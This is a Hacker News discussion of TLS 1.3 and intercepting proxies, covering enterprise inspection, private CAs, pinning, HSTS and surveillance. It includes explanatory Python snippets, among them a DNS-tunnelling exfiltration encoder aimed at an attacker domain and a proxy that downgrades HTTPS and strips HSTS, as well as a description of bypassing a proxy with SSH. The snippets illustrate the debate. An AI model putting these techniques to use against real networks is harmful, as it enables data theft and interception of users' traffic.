TLS 1.3 and Proxies (imperialviolet.org)
304 points by wglb 9 months ago | 144 comments



I just read the discussion and I see that people are conflating a few things and having an emotional response. There are different types of network operators, and they differ in whether they have any business snooping on your traffic.

There is a difference between an unauthorized party intercepting TLS communication, and a party you have authorized to do so.

Let's say I am a private person and am trying to access my bank account through a TLS connection. I am connected via WiFi to my cafe. I have not authorized the cafe, its uplink provider, nor any of the other network operators between me and the bank to intercept my traffic. It should be impossible to do so.

Let's say I am an employee of a financial institution. This company, in order to comply with record-keeping laws, needs to log all network connections. One of the conditions of my employment is that I authorize the company to intercept my network communications. The proxies within my company should be able to intercept my communications. However, no network operator outside of the company I work for, and to which I have given consent to intercept my traffic, should be able to intercept the communications.

The real world presents situations that are more nuanced than "encrypt everything and don't let anyone between me and the destination to see what is going on." There are many places where the above is the desired and sensible requirement. There are also many use cases where crypto is warranted, but select parties should have the ability to break it.

How this should happen remains to be seen. In the examples I have given above, "consent" will have to come both as an actual agreement and as some crypto key that allows the privileged proxies to intercept my traffic.


Note that nothing about TLS 1.3 prevents a proxy whose CA certificate is installed by the user from MitMing a TLS 1.3 session. This is also why certificate pins are ignored when a cert is signed by a manually installed certificate.

What TLS 1.3 does appear to do is make it harder to optimize this proxying, and make it impossible to be selective about what you proxy. However, both such optimizations and selective proxying are apparently hard to implement securely. Now, selective proxying is nice to have: it is better if enterprises don't intercept traffic to banks or social networks. However, it seems to me like Facebook would be a nice side channel for exfiltrating data.

It seems to me that selective proxying could still be solved at the DNS level. Make every domain except the whitelisted ones resolve to a proxy, and then have the proxy in between all traffic. This means you also proxy all unencrypted traffic to the outside world, but if you are proxying TLS, you probably want to block or proxy plaintext outbound connections as well.
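A minimal sketch of that DNS-level approach, for illustration only (the whitelist, proxy address, and upstream resolver below are all invented): whitelisted names resolve normally, and everything else is pointed at the inspection proxy.

```python
# Hypothetical sketch of DNS-based selective proxying. Names and
# addresses here are made up; a real deployment would hook this into
# the resolver your clients actually use.

WHITELIST = {"www.bankofamerica.com", "www.examplebank.com"}
PROXY_IP = "10.0.0.53"  # internal TLS-inspecting proxy

def resolve(name, upstream_lookup):
    """Whitelisted names resolve normally; everything else hits the proxy."""
    if name.lower().rstrip(".") in WHITELIST:
        return upstream_lookup(name)  # direct, uninspected path
    return PROXY_IP                   # all other traffic goes via the proxy

# Example with a fake upstream resolver:
fake_upstream = lambda name: "171.161.148.158"
print(resolve("www.bankofamerica.com", fake_upstream))  # direct answer
print(resolve("unknown-site.example", fake_upstream))   # proxy address
```

Because the decision happens before any TLS handshake, this works regardless of what the protocol encrypts, as long as clients can't bypass the resolver.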


> What TLS 1.3 does appear to do is make it harder to optimize this proxying, and make it impossible to be selective about what you proxy.

You have the Server Name Indication (SNI) in the ClientHello, so selective proxying is very easy to implement with TLS 1.3. SNI wasn't mandatory in older versions, which is why middleboxes went for this "let's inspect the certificate" dance in the first place.
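For illustration, pulling the SNI out of a ClientHello's extensions block is only a few lines of parsing. This sketch takes just the raw extensions bytes (not a whole TLS record) and ignores malformed input:

```python
import struct

def sni_from_extensions(ext: bytes):
    """Scan a TLS extensions block for server_name (extension type 0)
    and return the first host_name entry, or None if absent."""
    i = 0
    while i + 4 <= len(ext):
        etype, elen = struct.unpack_from("!HH", ext, i)
        i += 4
        if etype == 0:  # server_name extension
            # skip server_name_list length (2 bytes) and name_type (1 byte),
            # then read the 2-byte host_name length
            (name_len,) = struct.unpack_from("!H", ext, i + 3)
            return ext[i + 5 : i + 5 + name_len].decode("ascii")
        i += elen
    return None
```

Since this field stays in plaintext in the ClientHello even under TLS 1.3, a middlebox can make a forwarding decision without ever seeing the certificate. Of course, as noted downthread, the client can put anything it likes in there.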


To do TLS proxying properly, you need to verify the cert on 'trusted' domains. SNI is not verified.

Thus, a proxy using SNI to identify the host would be circumvented by using facebook.com or www.bankofamerica.com as the name in SNI and just ignoring SNI at the malicious endpoint.

As TLS 1.3 encrypts the certificate, you can't check the certificate without actually MitMing the connection. Thus, whitelisting isn't possible in TLS 1.3, unless you trust the (attacker-controlled) SNI, at which point, why even do TLS proxying?

Note that, according to the article, many TLS 1.2 proxies don't actually verify the certificate by default, which means my masquerade-as-facebook.com ploy would also work against them. This can be done by simply using a false 'common name' field in the cert. The defense against this is easy: it is the certificate validation all browsers do. Apparently, these middleboxes do not use this validation by default.
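As a concrete reference point for "the certificate validation all browsers do": in Python's standard library, for instance, the default client-side TLS context enables exactly the two checks those middleboxes apparently skip:

```python
import ssl

# ssl.create_default_context() enables the same two checks browsers do:
ctx = ssl.create_default_context()

# 1) the presented chain must verify up to a trusted root...
assert ctx.verify_mode == ssl.CERT_REQUIRED
# 2) ...and the certificate must actually name the host we asked for.
assert ctx.check_hostname is True

# A middlebox that disables both will happily accept a self-signed
# certificate whose subject merely *claims* to be facebook.com.
```

A proxy that turns either check off, for speed or compatibility, is exactly the kind that the masquerade ploy defeats.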

This is generally seen as a compelling argument against the deployment of TLS proxies. The argument being that they are 'security theater' as opposed to actual security, on account of them being easy to spoof.


There is a strong argument that in the financial-institution case you should be just blocking web-bound TLS traffic, instead of lobbying internet standards to break TLS. The applications that want to route their traffic through inspection proxies can then do so explicitly.


> There is a strong argument that in the financial-institution case you should be just blocking web-bound TLS traffic

There is a simpler solution to let users still access the Web: let them do so unencrypted. They won't have the "Secure" symbol on their browser, which is extremely reasonable considering that, indeed, their access is not really secure: their employer can read all communications.

The employer simply sets up a proxy that receives unencrypted communications and encrypts them on the fly; essentially an HTTP-to-HTTPS gateway.


I think that would probably break a lot of web apps, which will use URLs with "https://" in them. Also, e.g., HTTP/2 doesn't work without TLS (the spec technically allows it, but no major browser actually implements it).


The proxy would redirect HTTPS requests to HTTP, and use HTTP 1.1 between the client and the proxy.

The bigger issue is HSTS; the proxy can remove the header, but if the origin is on the browser's preload list, that won't help, which means the browser would need to be customized to not have or enforce HSTS.
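A sketch of the two rewrites such a downgrade proxy would perform (function names here are invented): client-facing URLs go from https:// to http://, and the Strict-Transport-Security header is dropped from responses. Preloaded HSTS entries ship inside the browser and survive both.

```python
from urllib.parse import urlsplit, urlunsplit

def downgrade_url(url: str) -> str:
    """Rewrite https:// URLs to http:// for the client-facing leg."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        parts = parts._replace(scheme="http")
    return urlunsplit(parts)

def strip_hsts(headers: dict) -> dict:
    """Drop Strict-Transport-Security so the browser never pins to HTTPS."""
    return {k: v for k, v in headers.items()
            if k.lower() != "strict-transport-security"}
```

The proxy would apply `downgrade_url` to Location headers and page content, and `strip_hsts` to every response before forwarding it to the client.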


I guess that would be possible, although HTTP2 has some extra features like Server Push, which might be hard to "backport" cleanly.


One of the issues is that, due to poorly constructed legislation or private contracts, there may be a requirement to provide "industry-standard" protection for various network connections. TLS 1.3 will, in due time, be the industry standard.

This needs to be reconciled with the conflicting requirement to log, record, and/or block connections based on content.

Perhaps TLS 1.3 is not the solution here, as it can not reconcile this conflict. Perhaps something else needs to be developed that will provide a solution that meets these two requirements.


Where I work, the company has a TLS 1.2 proxy as discussed in the article. The stated purpose is to intercept malware. It frequently fails, as the fine article states, and people then either tether to their personal phone over 4G, or proxy traffic over SSH to a server they have at home. I can't imagine it's anything but "something must be done; we're doing something."

Furthermore, as most large companies install these, won't malware authors just start proxying C&C traffic over ssh on port 80? Or use other non-interceptable secure channels?


Could you cite the exact statute that requires logging mere connections?

I thought most of these compliance frameworks don't really specify how; they just say to compile, archive, and produce the data periodically (or on demand), make the system tamper-proof (or tamper-evident), and get it audited from time to time.


I am not aware of legislation, but there are many industries where there are compliance requirements that require monitoring, for example financial institutions, possibly FISMA.


> This needs to be reconciled with the conflicting requirement to log, record, and or block connections based on content.

If there is something to reconcile, the bug is in the law and should be fixed there.


Then you'll have no web bound traffic. It'll all soon be encrypted anyways, forced MITM attacks or not. And client boxes will continue to require investment in order to de-secure them. The corporate world can transition to being fundamentally insecure while the rest of the world will secure its traffic.


In some countries (not the USA), there are "secret laws" under which the government body that controls ISP licensing and legal matters can force ISPs to keep logs, not just metadata, of individual users' browsing and share them with law enforcement officials whenever asked, without any form of court order or legal paperwork. We already have to share the 'User Form' that users sign when getting internet connections, which contains all kinds of personal information, including pictures, addresses, phone numbers, and national ID numbers.

Failure to do so will get you heavily fined and your license to do business revoked. Also, you can't talk about it to the public.

I have friends and family in at least three countries who are involved in this industry and have confirmed to me that this is routine: log sharing, port mirroring, and putting black boxes in the middle of your core network are just routine work and have been for many years.


I think that in such situations, where a citizen of said country is not granting the operator the right to snoop, TLS 1.3 and its resistance to snooping accomplish the goal perfectly.

Perhaps such countries will outlaw TLS 1.3. Who knows. The US did outlaw strong encryption at one point because it didn't allow it access to data it wanted to have access to.


To your second point, that’s not exactly what happened. 128-bit encryption wasn’t outlawed, it was just illegal to export (the more useless 40-bit encryption was fine). There were various ways of working around this export ban before 2000 when it was rescinded (for most countries).

https://en.wikipedia.org/wiki/Export_of_cryptography_from_th...


I was going to guess one of these countries is China, but they don't really have secret laws; they monitor everything with mandates that are out in the open.


The parent was probably referring to laws pertaining to secrets, not laws that themselves are secret.


> This company, in order to adhere with record-keeping laws, needs to log all network connections. One of the conditions of my employment is that I authorize the company to intercept my network communications

Does that mean they also need to intercept communications from your phone to the internet when you're at work?


Generally no, because your phone is not allowed to have access to business records.


what about the camera of your phone?


> Let's say I am employee of a financial institution

So one institution has legal requirements that break users' rights, and we must change the internet for them?


Just because someone sits behind a computer doesn't mean they get to have complete control over, and privacy within, that computer. Specifically when they do not own that computer and are paid by someone else to do work using that computer.

In this sense, corporate users truly are different from private users. Similarly, company e-mail is not confidential. A very important requirement to this treatment of corporate users is that the end user ought to be made aware of this. Both with the company e-mail and the proxied company computer.

Part of the issue here is that sometimes encryption is bad. I for one dread the day I'll have to install some binary blob that communicates using TLS with a pinned cert I cannot override. Similarly, encryption and secure hardware modules are what enable boot-locked devices. The point being, cryptography can be used to take away control. Not just from big institutions but also from end users.

If we admit that sometimes cryptography is bad, there might be cases where we want a controlled way to break it. Again, this should be done with notice and all responsibilities lying with those taking the risk. That is, the party responsible for securing the proxy is also the party that is screwed when the proxy is compromised.

This might sound like encouraging key escrow for government access. It definitely is not. The issue there is notice (or choice, if non-escrow becomes outlawed) and the fact that a compromised system hurts end users, not the government. Thus, the incentives are misaligned for the government.


> If we admit that sometimes cryptography is bad

I'm not sure I follow, so because HSTS is a disaster then encryption is bad and we should switch to no encryption?


No, the point is simply that sometimes encryption has bad results. The example being an application that talks to its home server over an encrypted connection which cannot be audited.

Then, I propose we should also take issue with encryption that prevents TLS proxying in corporate settings.


> The real world presents situations that are more nuanced than "encrypt everything and don't let anyone between me and the destination to see what is going on." There are many places where the above is the desired and sensible requirement. There are also many use cases where crypto is warranted, but select parties should have the ability to break it.

In these institutions just block TLS 1.3 connections in the firewall. Where is the problem?


The reason TLS 1.3 has been delayed so long is vendors and researchers who believe the doublespeak that TLS needs to be both secure and readily interceptable (and therefore insecure) in order for it to be "ready" to use.

TLS and encryption aren't going anywhere, and they're not always going to wait around for a consensus from industry. The sobering truth is that, if not now, then in a decade or so, the companies shilling TLS/SSL interception appliances and software will need to shift focus, as the protocol will likely have evolved by force over time to meet the needs of increasingly prevalent surveillance states. TLS interception or "proxying" started out as a graduate student's parlour trick and eventually evolved into an entire shady industry, where players like Bluecoat are routinely caught selling their products and services to repressive regimes.

Here's hoping LibreSSL delivers the goods, with or without the marketing teams' say.


I should absolutely be able to intercept TLS traffic on my computers on my network. That's the distinction. Third party interception capability needs to be illegal and connections should be tamper evident.

Frankly, I have a higher duty than user privacy. My users have access to data that's critically sensitive in various ways, in some cases they face criminal sanction. I need to both control and detect unauthorized software on the network and ensure that users are following the rules.

More extreme privacy activists will make noises about using endpoint-based solutions or something similar. It's a bullshit position that will ultimately weaken security.


The largest ISP in Kazakhstan believes that it should be able to intercept all TLS traffic on their network: https://bits.blogs.nytimes.com/2015/12/03/kazakhstan-moves-t.... Because there are no technical differences between your TLS interception and what Kazakhtelecom is doing and no legal differences in most non-Western countries, I believe that all software should be changed to make TLS interception as hard as possible.


There is absolutely a significant legal and moral difference between national interception like Kazakhstan's and the interception we do to protect children we are guardians of, or to protect company secrets and integrity.

In the latter case, ideally (and possibly as legally required), you'd make acceptance of potential interception a condition of employment.


That isn't a technical problem, it's a Kazakhstan problem.


On your computers, yes. On your network, not so much. You have no right to intercept data just because you are moving it from one side to the other.

And that's the thing. There is nothing stopping those companies from analyzing the data once it reaches a managed computer. It is just that they want the capacity to do that on computers they don't manage.


Yeah, no. The network is my property and the contract our employees or partners sign establishes terms for using the network.

You cannot get out of the network unless the traffic is proxied. There are a few exceptions for identity-based reverse proxies that companies like Google talk about. But most places aren't there yet for sensitive applications outside of collaboration.

There's also the matter of trust. Some business partners are explicitly trusted, either by a private CA signed certificate or by a specific third party key that is independently validated.

Public networks are completely different. I am not talking about an ISP here.


What you're saying doesn't really address the issue marcosdumay raised: that is, the problem with allowing this kind of introspection is its susceptibility to abuse.

That said, your use-case of intercepting secure connections in your private network is a solved one: set up a private CA.

Wanting to weaken the security of TLS for everyone else for what amounts to your own convenience is very selfish.


Is setting up a private CA even enough with certificate pinning?


You should have a private CA set up if you're doing TLS inspection. I have one at home, deployed through Group Policy / Apple Configurator profiles, to filter web traffic on any system my daughter is logged into (she's five and plays games on pbskids.org and such; I need to make sure she can't even accidentally get at inappropriate content if I step away for a couple of minutes to get lunch prepared or something).

Unfortunately (?), some companies are actively working against IT administrators' (and, in my case, parents') ability to inspect TLS traffic on their networks -- Google being a big one, with the recent release of Android Nougat requiring apps to opt in to honoring user/admin-installed CAs. User privacy is important, but if you're using a company-issued phone, or allow their MDM to deploy a CA to the trust store on your own phone, you should know what you are signing up for. Google Chrome pins the certificates for Google-owned sites as well, so even if your private CA is installed in the system trust store, it will flat out refuse to load google.com, etc.


Come on man, be reasonable! If someone's boss saw that you were able to set this up for one user, in your spare time, that boss might think someone should just network-admin up and do the same for their organization. You know, rather than trying to break standards so they don't have to update the shitboxes they were silly enough to buy...


Oh gosh, network admins might actually have to learn how to do their job, or, more likely, managers might have to learn how to listen to them? The horror!


Re kids, might it be easier to whitelist sites instead?


That makes it harder for my wife to introduce her to new things. If I used a whitelist, she would have to pester me any time she wants to get our daughter onto a new site, and then there's the PITA of dealing with CDNs and other third-party sources that can change on a whim.

Whitelisting would be safer, but it's not worth the headache; we use blacklisting to prevent accidents during brief periods when we can't supervise her access, rather than fooling ourselves that it eliminates the need for supervision entirely.

Regardless, still need TLS inspection either way - even pbskids.org is served over HTTPS these days.


Could you make a whitelist that, when faced with a site not on the whitelist, serves up a webpage that asks for the parent to enter a passphrase to add this site to the whitelist?

Sounds like it could be a worthy venture. Make this software run on dd-wrt or whatever, then sell people WiFi routers with it preloaded so that they can just plug them into their existing routers with Ethernet, and voilà, they have a kid-friendly separate WiFi.


> Could you make a whitelist that, when faced with a site not on the whitelist, serves up a webpage that asks for the parent to enter a passphrase to add this site to the whitelist?

I could, but it's a lot more work than just installing Sophos XG on a used server and enabling filtering for certain users. I could also show my wife how to use the admin interface and add additional sites to the whitelist, but there's still the issue of CDNs and such that make life difficult.

> Sounds like it could be a worthy venture. Make this software run on dd-wrt or whatever, then sell people WiFi routers with it preloaded so that they can just plug them into their existing routers with Ethernet, and voilà, they have a kid-friendly separate WiFi.

Some companies already sell content filtering devices that sit somewhere on your home network. I'm not a fan of them, because they usually require you to install some client on your devices or use a captive portal for authentication. Some also have a monthly/annual subscription; for those that don't, I worry how they can even afford to keep the list up to date once they get out of the growth stage (or I'm out the money for the hardware if they fail to exit it at all).

I realize my setup at home isn't for your average user, but one huge advantage that nets it a high Spouse Acceptance Factor is that authentication to my firewall is done through RADIUS accounting packets, and I already have AD deployed at home. The moment you log in to my network, the wireless access point (or switch, for a wired connection) tells the firewall which user is assigned to a specific IP address. So my wife just signs in with her AD credentials on her iPhone/Surface Pro/etc., and the firewall already knows to let all her traffic through; if my daughter signs in on her computer/iPhone (she has my old 6+ to play games on), her traffic is immediately filtered.


Your setup sounds really interesting! Do you have a writeup somewhere?

Also, do you know of any way to filter YouTube (other than outright blocking it)? E.g. only allowing content from a whitelist of channels? YouTube Kids isn't really effective, unfortunately.


The HTTP Public Key Pinning specification says that browsers should/may (I forget which) ignore the pin if the chain ends up at a private locally-installed CA, for this very reason.


It's also worth mentioning that an MITM proxy with a private CA root certificate could just strip HPKP headers out of any webpage it sends you. If your computer is tied to its network (e.g., a corporate PC), it will never see the header, so there's no issue.


I'm confused, isn't this the normal criterion for a certificate being valid? If your certificate chain doesn't end in a locally-installed trusted CA then how is that any different from a random cert signed by a nobody off the street?


As tscs37 explained, there's a difference between the CAs that came with your OS/browser by default, and ones you have installed. Pins are usually ignored if the chain ends at the latter, because that's exactly the sort of scenario that would be used for corporate TLS MITM.


There is a difference between a local CA and a CA that is part of the root store and/or the system's CA bundle.


So terminating in a root CA imposes more restrictions than terminating in a non-root CA here? Something about that seems off...


Not root CA. Root store.

A root CA that has been installed by the computer administrator is assumed to be more trustworthy than the one installed by your OS.


This feels like it comes down to values more than security. Bottom line is you are intercepting my traffic as an employee.

I've worked in these places and I won't work for them. It places trust in my employer and other employees (most of whom I will never meet) that I'm not willing to give. Sure, you can tell me that certain sites aren't intercepted, and I can tell that from the origin of a certificate, but many employees can't, and don't understand any of this.

If your data is really so secure, set up an airgap. There are other ways of securing a corporate network that don't involve a 'just in case' dragnet.


> It places trust in my employer and other employees (most of which I will never meet) that I'm not willing to give.

Ditto, but my solution is to just not log into any important/private/nonpublic stuff on employer networks. There's plenty of other non-proxy stuff an employer can install that I also don't trust, and won't necessarily detect, so this seems like a good general policy, irrespective of my employer/coworkers. And if I'm going to be taking that "assume I have no privacy" security stance anyway... them being up front about one of the technologies they're using to secure stuff is, if anything, a good sign.

I've got a non-MITMed cellular connection on my own hardware in my pocket if I'm really hard up for a private connection. I do draw a line at the point where anyone wants to install anything on my own devices. I've temporarily allowed it exactly once - with the device not leaving my sight, and with it being reformatted by myself both before joining it to the work network, and then again before joining it to my home network (although given the potential for firmware malware / IME type stuff, perhaps that's still not cautious enough.)

> If your data is really so secure setup an airgap.

Been there. And I'm paranoid enough to be half tempted to set one up at home. They're a PITA for some workflows though - e.g. needing to play a game of telephone for SDK updates. And then you still can't browse Facebook or whatever with your corporate network. Intercepting traffic instead of completely blocking it is a convenience/security tradeoff.

> but many employees can't and don't understand any of this.

This is admittedly a problem. And they still won't even when the IT department says "we've basically installed our own malware onto 'your' computers / our network, maybe don't log into your bank account from work, we're already going to be feeling terrible and losing sleep if/when our security appliance gets pwned."

So maybe it'd be a good idea ethically and exposure-wise to block facebook/google services/banks if you're going to MITM despite potentially pissing off those who are fine with trusting their employers/coworkers. But I'm relatively OK with a well communicated and disclosed TLS proxy for work networks.


> Yeah, no. The network is my property and the contract our employees or partners sign establishes terms for using the network.

And on that basis, you're prepared to throw such a tantrum as to hold up completion and adoption of a crucial cornerstone of protection for people who actually need privacy?


So you're ok with a compromised printer leaking your medical records? Or notes used by a police investigator while researching an unsubstantiated or even false accusation leaking thanks to some drive-by malware?

Interception of web traffic stops those threats.

Nobody is throwing a tantrum or compromising a cornerstone of security. You don't really understand the full scope of what you are talking about -- the "cornerstone of privacy" you speak of really means placing ultimate trust in every random web service.

TLS and the root trust problems associated with it are bad enough. Preventing users from making choices about who and what they trust makes those problems dramatically worse.


> So you're ok with a compromised printer leaking your medical records?

No, but you stop that by refusing to let the printer talk out of your network at all.

> Or notes used by a police investigator while researching a unsubstantiated or even false accusation leaking thanks to some drive by malware?

That's where on-host monitoring can protect you. It'll also protect you in case that computer can ever connect to any other network.


>No, but you stop that by refusing to let the printer talk out of your network at all.

That's a lost battle, honestly. If you block traffic from the printer to the internet, it starts sending UDP with faked source addresses.

If you deploy a VLAN, the printer can fake the VLAN tags. If you physically separate the printer from any direct connection to your firewall, the printer can look for anything on the network it can use to bounce traffic off (like a DNS server or a computer accepting ICMP echo requests).

A sufficiently dedicated attacker can and will extract information through covert channels.
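To make the point concrete, here is an illustrative (and deliberately simplistic) sketch of one such covert channel: smuggling data out through DNS lookups to an attacker-controlled zone ("drop.example" is made up). Any network that lets a device resolve arbitrary names gives this a path out.

```python
import base64

def exfil_query(chunk: bytes) -> str:
    """Encode a chunk of data as a DNS label under an attacker's domain.
    The recursive resolver dutifully forwards the query -- and the data --
    to the attacker's authoritative nameserver."""
    label = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
    return label + ".drop.example"

# e.g. exfil_query(b"secret") -> "onswg4tfoq.drop.example"
```

Real tooling chunks larger payloads across many queries and adds sequencing, but even this toy version shows why "the printer can reach a DNS server" is equivalent to "the printer can reach the internet."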


Yeah, I mean it really depends on the brass tacks here.

Whatever happens with TLS1.3, obviously the looming idiocy of the CA system is a larger problem. And yes, you're right, trusting random web services (ie, the other endpoint) is often a mistake.

But at the end of the day, the users that need to be served by TLS are the endpoints, not the proxy operators.

(FWIW, I suspect that TLS as we know it will shift fairly radically anyway as distributed applications become more prominent).


All you have to do is block all TLS on your network and you're good to go.


Do you really think a silly proxy will deter an evil employee from getting data off your computers? There are a myriad of other ways to extract data: a USB stick, a WiFi hotspot from your 4G phone, bringing the whole laptop home, or simply obfuscating/encrypting the data and tunneling it over something that looks legit.

Do you ever go through your proxy logs and when was the last time you actually found something suspicious?


Epoxying the USB ports and locking in the network connection settings with Group Policy are par for the course in the kind of organization that would implement TLS interception.


Nope, they don't. Most organizations are what I call "casual creeps". They buy some badly made security appliance or software suite, install the certificate through some Active Directory policy, and call it a day, as their IT staff snigger behind the scenes at whatever their employees are doing. If they made their creepy behavior more public, they would, rightfully so, start getting higher employee turnover.

Even very sophisticated large tech companies don't epoxy their USB ports on their employee macbooks.

// EDIT: They also cover their asses with some "network use policy" that is the vaguest possible thing, such that even most software engineers don't understand the full extent of what is done. It's pretty disgusting, and I can't wait until some combination of GDPR-style informed consent and what is law in Austria[1] is put into employment law.

[1] https://www.taylorwessing.com/globaldatahub/article_austria_...


Yeah how could they sell their used laptops when they upgrade, if there were epoxy in the ports? I've never heard of any named non-military organization doing that. You're totally right about the network creepers, too. They're easy to spot: just point out some of the problems with proxy shitboxes or the ridiculous EULAs that come with them and see who gets pissed off.


So true. I've worked in tons of places with proxies, but zero with epoxied USB ports or locked-down network configuration. The only thing these proxies ever achieved was lower productivity, due to hours of configuring custom software or not being able to browse useful information on legit sites like Stack Overflow. It's just a play by IT so they can add a tickbox saying their network is secure, when in fact it's a big fat joke, as these proxies usually act on a blacklist basis and not a whitelist.


> You cannot get out of the network unless the traffic is proxied

The place I work does this, and it's a constant PITA that gets in the way of me doing my job. But I think if you have a system to put exceptions in place, and it doesn't take 47 weeks of email ping-pong with 18 different managers, then it's fine.

Unfortunately, where I work is a bureaucratic nightmare.

But it's easily gotten around: I have a cloud-hosted VM (paid for by the company MSDN subscription!) that runs SSH on port 443, so the HTTP proxy will let me through to set up a tunnel, through which I can access anything using SOCKS.


This seems like such an old fashioned way of thinking. Internet access is increasingly a fundamental human right and is needed to interact with most government services in first world countries.

I think assuming you can control any packets that pass through a network ends up being a losing proposition. Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled? Failing that, install software on users computers and don’t allow them to use any non-work internet resources.


>Internet access is increasingly a fundamental human right and is needed to interact with most government services in first world countries.

That's all well and good, but you don't need to do it from your desk at a regulated financial institution.

>I think assuming you can control any packets that pass through a network ends up being a losing proposition.

This is a very strange statement. All security is always a losing proposition. The best anyone can ever hope for is raising the bar of cost and sophistication an attacker will have to surmount to be successful, but you're still very much obligated (legally, and ethically) to do that. If you possess sensitive data, you need to take steps to detect and prevent exfiltration. If you have employees (such as registered broker-dealers) whose conversations with the outside must be monitored and retained under the law, you need to make sure they're using only the properly configured communication channels.

>Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled

Because TLS interception is about preventing unwanted egress/exfiltration from the (relatively) trusted zone of a corporate network.

>Failing that, install software on users computers and don’t allow them to use any non-work internet resources.

Installing the corporate CA on managed endpoints is a prerequisite for TLS interception. The problem VPNs solve has nothing to do with this.


TLS interception is predicated on whitelisting your own CA on the endpoint. Can't really do that if you don't manage it. And in any case, you need to be resilient to a rogue or compromised device.


> I should absolutely be able to intercept TLS traffic on my computers on my network.

Just ask the users of your network to install your CA cert (or click past your cert warnings). That should work with TLS 1.3, right?

Or in your statement are you really meaning, "I should absolutely be able to intercept TLS traffic on my computers on my network without them knowing about it"? If so, that's a completely different thing altogether and if that's what you and the GCHQ mean when talking about proxying, it needs to be explicitly stated. There is a huge difference.


> I should absolutely be able to intercept TLS traffic on my computers on my network. ... / Frankly, I have a higher duty than user privacy. My users have access to data that's critically sensitive in various ways, in some cases they face criminal sanction. I need to both control and detect unauthorized software on the network and ensure that users are following the rules.

Perhaps the security agencies view their country as "my network", and then if you read the rest of the quote, everything follows from there.

There are big differences: The coercive power of government, and the necessity of civil rights and peacefully organizing against the government; compared with the 'at will' relationship with a company and its interest, generally considered legitimate, in ultimate authority and stopping insubordination.

On the other hand, large companies are not really 'at will'; people can't just walk away from jobs 'at will', especially when they have children, mortgages, other debts, or (in the U.S.) health problems. Also, some insubordination is legitimate: Labor organizing, legal and regulatory complaints (EEOC, safety, etc.), and probably other things I'm not thinking of.

The distinction isn't so clear cut. I'm not sure the objection of the corporate sysadmin is that much more valid than the government security agency. Also, the security agency often has far more at stake.


TLS 1.3 doesn't change that, you can still MITM connections using your own root CA certificate installed on users' devices. Not quite sure what you're arguing against here.
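To make that concrete: with Python's ssl module, pinning a client to TLS 1.3 and adding an extra trusted root are both ordinary configuration. This is a sketch; the corporate CA file name is hypothetical.

```python
import ssl

# A client context restricted to TLS 1.3.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_3

# Nothing in TLS 1.3 stops interception once the proxy's root CA is
# trusted by the client. Uncommenting this (hypothetical path) is all
# an intercepting proxy deployment needs on the endpoint:
# ctx.load_verify_locations(cafile="corp-root-ca.pem")

print(ctx.minimum_version == ssl.TLSVersion.TLSv1_3)
```

The interception happens (or doesn't) entirely as a function of what the endpoint trusts, not of the protocol version.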


You're saying with a straight face that you want to have encryption containing a backdoor. How is your demand different from the FBI's and its ilk?

Intercept the traffic on your machines, if that's a legal requirement.


Let's say a user has to access something confidential over your network to an outside resource that has to follow HIPAA guidelines.

Intercepting that data would be a HIPAA violation; how do you avoid that?


Do you have a citation for this? I do security reviews for companies with strong HIPAA requirements and I’m nearly certain this is incorrect.


We properly presume your network to be hostile and malicious to security. You've declared it so. Therefore everything is encrypted and secured. Your hostile network is no different than a hostile network of a small country bent on attacking the security of the communication.

So feel free to have insecure communication provided you control all devices on the network. It will still be insecure.


To be clear, TLS 1.3 has no (or negative) support for interception. The delays are due to adding hacks to cleanly prevent interception, not to add it.


I don't understand your reference to LibreSSL in the context of your comment—why would they be different from any of the other SSL implementations? Are they planning on implementing something else besides TLSv1.3 per spec, or intentionally implementing more or less than the spec requires?


I agree with regards to appliances like Bluecoat, but is TLS as a black box to keep users from seeing what the device is sending over the wire better?


This needs to be highlighted more often. TLS interception can be a very effective tool to expose insecure APIs and blatant privacy violations. It's ultimately a tradeoff between security (no bad interception) and privacy (no idea what my device is sending).


TLS doesn't prevent you from intercepting your end of the connection on a device you control. If you don't control your own device then the problem is with your device, not TLS. We shouldn't weaken TLS just because you chose to hand control of your device to someone else.


Well I agree. My main concern is that we're loosing that control in the name of security, in particular on mobile devices. Take Android as an example, which doesn't respect user-added CAs anymore for application traffic [1]. It's even worse with cert-pinned iOS apps where you cannot root easily, although Apple is at least trying to fix this with App Transport Security (which does respect user-added CAs).

I definitely do not want to see a weaker TLS - 1.3 is great. At the same time, I do not want to have 'security improvements' that make it impossible for average developers to see their own device's traffic. That will ultimately enable insecure APIs and gross privacy violations behind TLS.

[1] https://github.com/mitmproxy/mitmproxy/issues/2054


> My main concern is that we're loosing [sic] that control in the name of security

If you've lost that control you have nobody to blame but yourself. There are devices and operating systems on the market that do not require you to give up that control. If you choose to buy a device you can't root and an OS you can't modify, that's all on you.


> ...and privacy (no idea what my device is sending).

This is where Libre/Open Source software comes in and why it plays a vital role in creating an ethical connection between people and software. There is literally no other way around this. Open code, secure transmission, harsh accountability on violations.


Open source is great, but using source code is an awful way to figure out what something is transmitting, compared to actually looking at what it transmits.


Let's be pragmatic here though - it's not reasonable to expect all software to be open source, nor is it reasonable to expect that only people who run a fully FOSS stack be able to inspect network traffic on their computer.


By definition the insistence that it should be possible to do something that's actually impossible is not pragmatism.

If you don't actually control the box, it can do whatever it pleases. It doesn't need an IETF Standards Track RFC, it can just choose to do it and you can't stop it.


I agree, I'm continually saddened by the zealotry of the anti-surveillance lobby and the seeming dismissal of the privacy focused hacker who wants to know when exactly does Uber send data, and what exactly do they send.

Especially when it goes as far as encoding the philosophy that state actors are the only problem that matters into the very protocol.


Could you explain how TLS 1.3 in any way reduces your ability to intercept traffic on your own devices?


TLS 1.3 still enables exactly that.


>the protocol will likely have been evolved by force over time to meet the needs of increasingly prevalent surveillance states.

Are you saying the protocol will be easier or harder to intercept in the future?


Wow, the linked GCHQ piece is impressive: The title is that TLS 1.3 is "harder for enterprises" because "Many enterprises have security appliances that seek to look into TLS connections to make sure that the enterprise security is appropriately protected." And, later: "It certainly looks like it’ll have a negative effect on enterprise security."

Open lobbying against crypto from the spooks, in the name of collective security, is of course not a new thing - but dressing it as necessary for "enterprise security" in standards lobbying is a clever move.


To be fair to the original author, NCSC is no longer part of GCHQ.


There is a prominent "a part of GCHQ" banner at the top.


Wow, that’s the biggest facepalm I’ve done recently. I was under the impression that they were officially split but apparently not. They’ve definitely now got separate office blocks, and more of an operational split than the previous CESG ever had at least.


Having worked in locked down networks before, I get the idea of securing resources and keeping secure data inside the network.

